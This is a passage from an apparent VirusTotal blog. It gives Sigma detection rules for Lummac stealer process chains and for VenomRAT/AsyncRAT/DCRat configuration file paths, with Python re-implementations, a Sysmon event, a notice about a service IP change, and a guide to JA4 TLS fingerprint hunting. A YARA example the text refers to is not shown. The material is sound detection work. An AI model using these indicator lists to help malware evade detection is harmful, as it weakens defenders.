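To make the link between the rule and this event explicit, the detection logic can be replayed by hand. This is a hand-written sketch with hypothetical function names, not a Sigma engine: it assumes Sigma's default case-insensitive string matching, treats the list under selection_child as an OR, and combines both selections with AND as the condition states.

```python
def endswith_ci(value: str, suffix: str) -> bool:
    """Case-insensitive endswith, mirroring Sigma's default string matching."""
    return value.lower().endswith(suffix.lower())


def matches_more_vbc(event_data: dict) -> bool:
    """Evaluate 'all of selection_*' for the more.com / vbc.exe rule."""
    selection_parent = endswith_ci(event_data.get("ParentImage", ""), "\\more.com")
    # A list of maps under a selection means any one of them may match.
    selection_child = (
        endswith_ci(event_data.get("Image", ""), "\\vbc.exe")
        or event_data.get("OriginalFileName", "").lower() == "vbc.exe"
    )
    return selection_parent and selection_child
```

Fed with the EventData fields shown above (ParentImage ending in \more.com, Image ending in \vbc.exe), the function returns True.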

File Creation Related To RAT Clients

title: File Creation Related To RAT Clients
  id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
  status: experimental
  description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
  references:
      - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
      - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-15
  tags:
      - attack.execution
  logsource:
      category: file_event
      product: windows
  detection:
      # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
      # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
      selection_required:
          TargetFilename|contains: '\AppData\Roaming\'
      selection_variants:
          TargetFilename|endswith:
              - '\datalogs.conf'
              - '\hvnc.conf'
              - '\dcrat.conf'
          TargetFilename|contains:
              - '\mydata\'
              - '\datalogs\'
              - '\hvnc\'
              - '\dcrat\'
      condition: all of selection_*
  falsepositives:
      - Legitimate software creating a file with the same name
  level: high
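
The condition "all of selection_*" means that both selections must match. Inside selection_variants, the endswith list and the contains list must each match at least one value. The following Python function is a minimal sketch of that logic for a single TargetFilename value. It assumes Sigma's default case-insensitive string matching. The function name and constants are illustrative and are not part of the rule or of any Sigma backend.

```python
# Illustrative re-implementation of the rule's condition for one path.
# Not how a Sigma backend evaluates the rule; names here are hypothetical.
REQUIRED_SUBSTRING = "\\appdata\\roaming\\"
VARIANT_SUFFIXES = ("\\datalogs.conf", "\\hvnc.conf", "\\dcrat.conf")
VARIANT_FOLDERS = ("\\mydata\\", "\\datalogs\\", "\\hvnc\\", "\\dcrat\\")


def matches_rat_conf_rule(target_filename: str) -> bool:
    """Return True when the path satisfies both selections of the rule."""
    # Assumption: values are compared case-insensitively, as Sigma does by default.
    path = target_filename.lower()

    # selection_required: the file must be under AppData\Roaming.
    selection_required = REQUIRED_SUBSTRING in path

    # selection_variants: one known file name AND one known folder name.
    has_known_suffix = path.endswith(VARIANT_SUFFIXES)
    has_known_folder = any(folder in path for folder in VARIANT_FOLDERS)
    selection_variants = has_known_suffix and has_known_folder

    # condition: all of selection_*
    return selection_required and selection_variants
```

Because both parts of selection_variants are required, a file named DataLogs.conf in an unrelated folder under AppData\Roaming would not match.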

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }
}

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. This approach supports the development of detections for recent behaviors that existing detection mechanisms do not yet cover, which can help organizations get ahead of threats by building detections from threat hunting missions.
The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma's public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:
Lummac Stealer Activity - Execution Of More.com And Vbc.exe
sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c
File Creation Related To RAT Clients
sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252
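
For scripted hunting, the same queries can be sent to the VirusTotal API v3 Intelligence search endpoint. The sketch below only builds the request URL and sends nothing. It assumes an account with access to VirusTotal Intelligence, and the actual request would also need the API key in the x-apikey header. The function name and the default limit are illustrative.

```python
from urllib.parse import urlencode

# VirusTotal API v3 Intelligence search endpoint.
VT_SEARCH_ENDPOINT = "https://www.virustotal.com/api/v3/intelligence/search"


def build_sigma_search_url(rule_id: str, limit: int = 10) -> str:
    """Build the search URL for files matched by a given Sigma rule ID."""
    # The query string is the same one typed into the search box.
    query = f"sigma_rule:{rule_id}"
    return f"{VT_SEARCH_ENDPOINT}?{urlencode({'query': query, 'limit': limit})}"


# Example with the rule ID for "File Creation Related To RAT Clients".
url = build_sigma_search_url(
    "8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252"
)
```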
We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.

Important Update: IP Address Change for VirusTotal

12 November 2024 at 11:43

We're making a change to the IP address for www.virustotal.com. If you're currently whitelisting our IP address in your firewall or proxy, you'll need to update your rules to maintain access to VirusTotal.

Starting November 25th, we'll be gradually transitioning the resolution of www.virustotal.com to a new IP address: 34.54.88.138. If you have hardcoded the previous IP address (74.125.34.46) in your firewall or proxy, you'll need to update your configuration to include the new IP address. This will ensure continued access to VirusTotal.
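
If your allowlist is kept as a list of addresses or CIDR ranges, a quick check like the following can confirm whether the new address is already covered. This is a minimal sketch using Python's standard ipaddress module. The function name and the sample allowlist are illustrative and do not reflect any particular firewall product.

```python
import ipaddress

# Addresses taken from the announcement above.
NEW_VT_IP = ipaddress.ip_address("34.54.88.138")
OLD_VT_IP = ipaddress.ip_address("74.125.34.46")


def allowlist_covers(allowlist, ip) -> bool:
    """Return True if any allowlist entry (single IP or CIDR) contains ip."""
    return any(
        ip in ipaddress.ip_network(entry, strict=False) for entry in allowlist
    )


# Hypothetical allowlist that still only contains the previous address.
current_rules = ["74.125.34.46"]
needs_update = not allowlist_covers(current_rules, NEW_VT_IP)
```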

TLS Certificate provider change:

We're also updating our TLS certificate provider, moving from a DigiCert wildcard certificate to a Google Trust Services single-host certificate. While this change should be seamless for most users, you'll need to update your configuration if you validate the certificate's signer or subject.

Note for Big Files API Users:

If you use the Big Files endpoint (https://docs.virustotal.com/reference/files-upload-url) for submitting files larger than 32MB, remember that it provides a URL pointing to the bigfiles.virustotal.com domain.

This domain is managed by a ghs.googlehosted.com load balancer, which uses dynamic IP address resolution. Please ensure your firewall rules can accommodate this.

We'll be implementing this change gradually starting on November 25th to minimize any potential disruption.

We understand that this change may require adjustments to your systems, and we appreciate your prompt attention to this matter. If you have any questions or concerns, please don't hesitate to contact us.

Unveiling Hidden Connections: JA4 Client Fingerprinting on VirusTotal

18 October 2024 at 11:48
VirusTotal has incorporated a powerful new tool to fight against malware: JA4 client fingerprinting. This feature allows security researchers to track and identify malicious files based on the unique characteristics of their TLS client communications.

JA4: A More Robust Successor to JA3

JA4, developed by FoxIO, represents a significant advancement over the older JA3 fingerprinting method. JA3's effectiveness had been hampered by the increasing use of TLS extension randomization in HTTPS clients, which made fingerprints less consistent. JA4 was specifically designed to be resilient to this randomization, resulting in more stable and reliable fingerprints.

Unveiling the Secrets of the Client Hello

JA4 fingerprinting focuses on analyzing the TLS Client Hello packet, which is sent unencrypted from the client to the server at the start of a TLS connection. This packet contains a treasure trove of information that can uniquely identify the client application or its underlying TLS library. Some of the key elements extracted by JA4 include:
  • TLS Version: The version of TLS supported by the client.
  • Cipher Suites: The list of cryptographic algorithms the client can use.
  • TLS Extensions: Additional features and capabilities supported by the client.
  • ALPN (Application-Layer Protocol Negotiation): The application-level protocol, such as HTTP/2 or HTTP/3, that the client wants to use after the TLS handshake.
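
These elements are visible in the first section of a JA4 string (JA4_A). The Python sketch below splits a fingerprint into its parts. The field layout follows FoxIO's public description of the JA4 format rather than anything stated in this post, so treat it as an assumption. The class and function names are illustrative.

```python
from dataclasses import dataclass


@dataclass
class Ja4Parts:
    protocol: str         # "t" for TLS over TCP, "q" for QUIC
    tls_version: str      # e.g. "13" for TLS 1.3, "10" for TLS 1.0
    sni: str              # "d" if SNI (a domain) is present, "i" otherwise
    cipher_count: int     # number of cipher suites offered
    extension_count: int  # number of extensions offered
    alpn: str             # first and last character of the first ALPN value, "00" if none
    ja4_b: str            # truncated hash derived from the cipher suites
    ja4_c: str            # truncated hash derived from the extensions


def parse_ja4(fingerprint: str) -> Ja4Parts:
    """Split a JA4 fingerprint into JA4_A fields plus the JA4_B and JA4_C hashes."""
    ja4_a, ja4_b, ja4_c = fingerprint.split("_")
    if len(ja4_a) != 10:
        raise ValueError(f"unexpected JA4_A length: {ja4_a!r}")
    return Ja4Parts(
        protocol=ja4_a[0],
        tls_version=ja4_a[1:3],
        sni=ja4_a[3],
        cipher_count=int(ja4_a[4:6]),
        extension_count=int(ja4_a[6:8]),
        alpn=ja4_a[8:10],
        ja4_b=ja4_b,
        ja4_c=ja4_c,
    )


parts = parse_ja4("t10d070600_c50f5591e341_1a3805c3aa63")
```

Under this layout, the fingerprint above would describe a TLS 1.0 client that sends SNI, offers 7 cipher suites and 6 extensions, and sends no ALPN value.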

JA4 in Action: Pivoting and Hunting on VirusTotal

VirusTotal has integrated JA4 fingerprinting into its platform through the behavior_network file search modifier. This allows analysts to quickly discover relationships between files based on their JA4 fingerprints.

To find the JA4 value, navigate to the "behavior" section of the desired sample and locate the TLS subsection. In addition to JA4, you might also find JA3 or JA3S there.

Example Search: Let's say you've encountered a suspicious file that exhibits the JA4 fingerprint "t10d070600_c50f5591e341_1a3805c3aa63" during VirusTotal's behavioral analysis.

You can click on this JA4 to pivot using the search query behavior_network:t10d070600_c50f5591e341_1a3805c3aa63. This search returns additional samples that share the same JA4 fingerprint, suggesting they might be related. A shared fingerprint could indicate that the files are part of the same malware family, share a common developer, or simply use the same TLS library.

Wildcard Searches

To broaden your search, you can use wildcards within the JA4 hash. For instance, the search behaviour_network:t13d190900_*_97f8aa674fd9 returns files that match the JA4_A and JA4_C components of the JA4 hash while allowing for variations in the middle section (JA4_B), which is derived from the cipher suite list. This technique is useful for identifying files that might use different ciphers but share other JA4 characteristics.
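
The same wildcard idea can be applied locally to fingerprints you have already collected, for example from exported sandbox reports. This is a minimal sketch using Python's standard fnmatch module. The function name is illustrative, and the middle sections in the sample list are made-up placeholders, not real observations.

```python
from fnmatch import fnmatchcase


def filter_ja4(fingerprints, pattern):
    """Keep only the fingerprints that match a shell-style wildcard pattern."""
    return [fp for fp in fingerprints if fnmatchcase(fp, pattern)]


# Placeholder fingerprints: the JA4_B values below are invented for illustration.
observed = [
    "t13d190900_000000000000_97f8aa674fd9",
    "t13d190900_aaaaaaaaaaaa_97f8aa674fd9",
    "t10d070600_c50f5591e341_1a3805c3aa63",
]

related = filter_ja4(observed, "t13d190900_*_97f8aa674fd9")
```

Here related keeps the first two entries, which share JA4_A and JA4_C and differ only in JA4_B.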

YARA Hunting Rules: Automating JA4-Based Detection

YARA hunting rules using the "vt" module can be written to automatically detect files based on their JA4 fingerprints. Here's an example of a YARA rule that targets a specific JA4 fingerprint:


These rules will flag any file submitted to VirusTotal that exhibits a matching JA4 fingerprint during behavioral analysis. The first rule matches only the exact fingerprint "t12d190800_d83cc789557e_7af1ed941c26". The second rule uses the regular expression /t10d070600_.*_1a3805c3aa63/, which matches only the JA4_A and JA4_C components and ignores the JA4_B cipher suite component. These fingerprints could be linked to known malware, a suspicious application, or any TLS client behavior that security analysts consider risky.
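
Outside YARA, the two matching conditions can be mirrored in Python to triage fingerprints offline. This is only a sketch of the comparison logic. It does not use the "vt" module, and the function names are illustrative.

```python
import re

# Exact fingerprint and regular expression quoted in the text above.
EXACT_JA4 = "t12d190800_d83cc789557e_7af1ed941c26"
JA4_PATTERN = re.compile(r"t10d070600_.*_1a3805c3aa63")


def exact_condition(observed_ja4s) -> bool:
    """Mirror of the first condition: any fingerprint equals the exact value."""
    return EXACT_JA4 in observed_ja4s


def regex_condition(observed_ja4s) -> bool:
    """Mirror of the second condition: any fingerprint matches JA4_A and JA4_C."""
    return any(JA4_PATTERN.search(fp) for fp in observed_ja4s)


# Fingerprint taken from the example search earlier in this post.
sample = ["t10d070600_c50f5591e341_1a3805c3aa63"]
```

For the sample list, regex_condition is satisfied because JA4_A and JA4_C match, while exact_condition is not.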



JA4: Elevating Threat Hunting on VirusTotal

VirusTotal's adoption of JA4 client fingerprinting will provide users with an invaluable tool for dissecting and tracking TLS client behaviors, leading to enhanced threat hunting, pivoting, and more robust malware identification.

Happy Hunting.
